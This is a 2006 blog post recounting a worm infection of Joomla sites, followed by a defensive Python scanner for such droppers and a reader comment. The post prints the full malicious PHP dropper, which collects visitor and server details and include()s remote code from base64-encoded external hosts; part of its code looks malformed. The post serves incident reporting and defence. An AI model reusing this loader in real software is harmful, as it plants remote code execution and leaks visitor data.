
Renzki's hack report

2006-04-24 @ 05:13 in Blaogy Dev

I got a very urgent call for help from Renzki this afternoon. All his Joomla sites got a parse error somewhere in the mosce.php file.

After checking Google and the Joomla forum I understood that it's a hack... or more precisely a worm virus. It's very annoying. In almost all directories, I see files like remote.php, guest.php, packages.php, tests.php, create.php etc... and also .htaccess files. Those files contain much the same script; they are base64_encode-ed, so we can understand the files by decoding them.


This is one of them:

<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1"."/?".$str))){} else {include(base64_decode("aHR0cDovLw==".base64_decode("dXNlcjcuaHRtbHRhZ3MucnU="."/?".$str);
} ?>

When those encoded strings are decoded, they are websites... usually http://xxx.xxx.ru

So they really are a virus.

I tried to remove the files manually but there are too many of them. So we had to reinstall Joomla using another path... and rename the Joomla database to be used with the new one. Then reinstall one by one all the modules and components and templates. And all that has to be done for all the infected sites.

That's the problem with open source... (Yes... open source matters) because everybody knows how your files are structured and if they find a hole, then you're kicked off.

And I was not supposed to work today.
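
The following Python scanner is an added example, not part of the original post: it walks a web root and lists the .php files that include() something built from base64_decode() literals which decode to a URL scheme or hostname, the shape of the dropped file shown above. The function names, the regexes and the placeholder host files.example.invalid are assumptions made for this example.

```python
import base64
import os
import re
import tempfile

# Literal arguments to base64_decode(), as in base64_decode("aHR0cDovLw==")
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']')
# include/require whose argument begins with a base64_decode() call
ENCODED_INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?[\s(]*base64_decode', re.I)
# Decoded text that is a URL scheme or looks like a bare hostname
NETWORK_HINT = re.compile(r'^(?:https?|ftp)://|^[a-z0-9-]+(?:\.[a-z0-9-]+)+$', re.I)

def decode_literals(source):
    """Plaintext of every base64_decode("...") literal that decodes to ASCII."""
    out = []
    for literal in B64_LITERAL.findall(source):
        try:
            out.append(base64.b64decode(literal, validate=True).decode("ascii"))
        except ValueError:  # bad padding/alphabet or non-ASCII bytes
            continue
    return out

def scan_tree(root):
    """Return [(relative_path, decoded_literals)] for suspicious .php files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                source = fh.read()
            decoded = decode_literals(source)
            if ENCODED_INCLUDE.search(source) and any(NETWORK_HINT.search(d) for d in decoded):
                findings.append((os.path.relpath(path, root), decoded))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed test data: one dropper-shaped file, one harmless file."""
    host = base64.b64encode(b"files.example.invalid").decode()  # placeholder host
    os.makedirs(os.path.join(root, "components"))
    with open(os.path.join(root, "components", "guest.php"), "w") as fh:
        fh.write('<? if ((include(base64_decode("aHR0cDovLw==")'
                 '.base64_decode("%s")."/?x"))){} ?>' % host)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php $t = base64_decode("aGVsbG8="); include("header.php"); ?>')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, decoded in scan_tree(tmp):
            print(rel, "->", decoded)
```

The scanner only reads files, so it can be run against a copy or backup of the site before deciding what to delete or restore.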

Comments

Aww hang on Hery ;) You still have a day off tomorrow, right? Take care and please don't work too hard lol (I'm joking). But wouldn't it be funny if one day you just made a big announcement to us that you are on strike lol... I don't know what would happen to all of us :O Anyway, I am sorry to hear what has happened. I can imagine all that amount of work and then being screwed by some stupid hacker or a virus, geezz! Well, take care and I still hope you will have a good day off :)

Posted by Mirana @ 12:28, 2006-04-24 [Reply]
